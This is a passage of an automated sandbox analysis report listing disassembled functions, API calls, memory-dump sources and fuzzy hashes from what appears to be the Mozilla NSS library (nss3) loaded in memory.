                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C800D90
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: free.MOZGLUE(00000000), ref: 6C800D99
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C722D3B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C800BAB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C800BBA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C800D7E
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C722D54
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C800BCB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: EnterCriticalSection.KERNEL32(?), ref: 6C800BDE
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: OutputDebugStringA.KERNEL32(?), ref: 6C800C16
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                                                                                                                                                                                                                          • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                                                                                                                                                                                                                                                          • API String ID: 420000887-1567254798
                                                                                                                                                                                                                                                                                          • Opcode ID: 440672afa18adfc3bf89ef9d0627e04b5fbe6ef3c170703d676c104af08a5f7b
                                                                                                                                                                                                                                                                                          • Instruction ID: dae94f7b98c429c23ebaf36e620b0773a9544f7db222a10ade6e4785d095745f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 440672afa18adfc3bf89ef9d0627e04b5fbe6ef3c170703d676c104af08a5f7b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3421D375201144AFDB609F54DE4DA963BB1EB8232EF844835E50893B22DB7CE858DBE1
                                                                                                                                                                                                                                                                                          Function 6C800EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Aborting,?,6C6E2357), ref: 6C800EB8
                                                                                                                                                                                                                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C6E2357), ref: 6C800EC0
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C800EE6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_Now.NSS3 ref: 6C800A22
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C800A35
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C800A66
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_GetCurrentThread.NSS3 ref: 6C800A70
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C800A9D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C800AC8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_vsmprintf.NSS3(?,?), ref: 6C800AE8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: EnterCriticalSection.KERNEL32(?), ref: 6C800B19
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C800B48
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C800C76
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_LogFlush.NSS3 ref: 6C800C7E
                                                                                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C800EFA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C6EAF0E
                                                                                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C800F16
                                                                                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C800F1C
                                                                                                                                                                                                                                                                                          • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C800F25
                                                                                                                                                                                                                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C800F2B
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                                                                                                                                                                                                          • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                                                                                          • API String ID: 3905088656-1374795319
                                                                                                                                                                                                                                                                                          • Opcode ID: 35367d921bc42a87afa3d65509a9b657b2af11390cd3b5fd32fb9265d68dd596
                                                                                                                                                                                                                                                                                          • Instruction ID: 4096160a6444527844fb5c3c126d1874c9a3bfc979cb4d6a8b4ba218fa2d2759
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35367d921bc42a87afa3d65509a9b657b2af11390cd3b5fd32fb9265d68dd596
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF0A4B59001187BEB203BA09C49D9B3E3DDF4626DF008434FD0956603DB36E918D6F2
                                                                                                                                                                                                                                                                                          Function 6C764DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000400), ref: 6C764DCB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6F87ED,00000800,6C6EEF74,00000000), ref: 6C751000
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PR_NewLock.NSS3(?,00000800,6C6EEF74,00000000), ref: 6C751016
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PL_InitArenaPool.NSS3(00000000,security,6C6F87ED,00000008,?,00000800,6C6EEF74,00000000), ref: 6C75102B
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C764DE1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C764DFF
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C764E59
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FAB0: free.MOZGLUE(?,-00000001,?,?,6C6EF673,00000000,00000000), ref: 6C74FAC7
                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C82300C,00000000), ref: 6C764EB8
                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6C764EFF
                                                                                                                                                                                                                                                                                          • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C764F56
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C76521A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1025791883-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 93979428282bdb88e4c0a994007154dfe2d97ec4bd3ef194ca37da4a5ed9f15e
                                                                                                                                                                                                                                                                                          • Instruction ID: 1efb4a9b06096ee5808f084b33d5c29c0aed34ee5806f5f2845a66dc360e2a34
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93979428282bdb88e4c0a994007154dfe2d97ec4bd3ef194ca37da4a5ed9f15e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FF1BD71E00209CFDB08CF55E9507AEB7B2BF45358F258129E815ABB82E775E981CF90
                                                                                                                                                                                                                                                                                          Function 6C6F4FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(00000001,00000000,6C840148,?,6C706FEC), ref: 6C6F502A
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(00000001,00000000,6C840148,?,6C706FEC), ref: 6C6F5034
                                                                                                                                                                                                                                                                                          • PL_NewHashTable.NSS3(00000000,6C74FE80,6C74FD30,6C79C350,00000000,00000000,00000001,00000000,6C840148,?,6C706FEC), ref: 6C6F5055
                                                                                                                                                                                                                                                                                          • PL_NewHashTable.NSS3(00000000,6C74FE80,6C74FD30,6C79C350,00000000,00000000,?,00000001,00000000,6C840148,?,6C706FEC), ref: 6C6F506D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: HashLockTable
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3862423791-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 8447c3fd4dc5ca2c8d6faad845a574fc3a1fd3be9e3547963b82ab1fa954a120
                                                                                                                                                                                                                                                                                          • Instruction ID: 0a6b5e5eadb825bb4344a3c31696dabf337c9a15c8860e207ec77b83e84c5b15
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8447c3fd4dc5ca2c8d6faad845a574fc3a1fd3be9e3547963b82ab1fa954a120
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB310CB1B412109BDF709A25880CB4737BDBB1336CF818134E52583640EBBCA805CBE5
                                                                                                                                                                                                                                                                                          Function 6C692E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C692F3D
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C692FB9
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C693005
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C6930EE
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C693131
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C693178
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: memcpy$memsetsqlite3_log
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                          • API String ID: 984749767-598938438
                                                                                                                                                                                                                                                                                          • Opcode ID: 2f1c9d6eafead713c50dd79346cac1374f10545e20dc6ae652460a180967084f
                                                                                                                                                                                                                                                                                          • Instruction ID: 7e8a7562243e4afcd9421e8648afc63b97ea84b23ad5076f5017be3f382b7039
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f1c9d6eafead713c50dd79346cac1374f10545e20dc6ae652460a180967084f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7B1B170E0522ADBCB18CF9DC985AFEB7B1BF48304F148429E849B7B41D3759941CBA8
                                                                                                                                                                                                                                                                                          Function 6C767F90 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_GetMonitorEntryCount.NSS3(?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C767FB2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EBA40: TlsGetValue.KERNEL32 ref: 6C6EBA51
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EBA40: TlsGetValue.KERNEL32 ref: 6C6EBA6B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EBA40: EnterCriticalSection.KERNEL32 ref: 6C6EBA83
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EBA40: TlsGetValue.KERNEL32 ref: 6C6EBAA1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EBA40: _PR_MD_UNLOCK.NSS3 ref: 6C6EBAC0
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?,?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C767FD4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B90AB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B90C9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: EnterCriticalSection.KERNEL32 ref: 6C7B90E5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B9116
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: LeaveCriticalSection.KERNEL32 ref: 6C7B913F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C769430: PR_SetError.NSS3(FFFFD0AC,00000000), ref: 6C769466
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C76801B
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C768034
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C7680A2
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7680C0
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C76811C
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C768134
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$Monitor$Enter$CriticalExitSection$Error$CountEntryLeave
                                                                                                                                                                                                                                                                                          • String ID: )
                                                                                                                                                                                                                                                                                          • API String ID: 3537756449-2427484129
                                                                                                                                                                                                                                                                                          • Opcode ID: 3e17f35b2f91982a54bf5a3abf56ba2d35371abad41f7f37b8f0a0c9708ebf7e
                                                                                                                                                                                                                                                                                          • Instruction ID: 288af226a60a389f7770a78d2ed1320ffc6386cf367be2a77edbe570b3e0fb96
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e17f35b2f91982a54bf5a3abf56ba2d35371abad41f7f37b8f0a0c9708ebf7e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE51F371A047049BE7219F36DE087AB77B0AF5334CF08493EDD9956E42EB31A909C792
                                                                                                                                                                                                                                                                                          Function 6C70FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C70FCBD
                                                                                                                                                                                                                                                                                          • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C70FCCC
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C70FCEF
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C70FD32
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C70FD46
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000001), ref: 6C70FD51
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C70FD6D
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C70FD84
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                                                                          • API String ID: 183580322-336475711
                                                                                                                                                                                                                                                                                          • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                                                                                          • Instruction ID: 9e2a48673b1f311036749ac618b5fcd59e3c5bd8f86de483bb64c379da502564
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF31E0F2F002159BEB108AA8DE167AFB7E8AF51318F150438DC14A7B00E771E918C7D6
                                                                                                                                                                                                                                                                                          Function 6C726C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_DigestInit), ref: 6C726C66
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C726C94
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C726CA3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C80D930: PL_strncpyz.NSS3(?,?,?), ref: 6C80D963
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C726CB9
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C726CD5
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
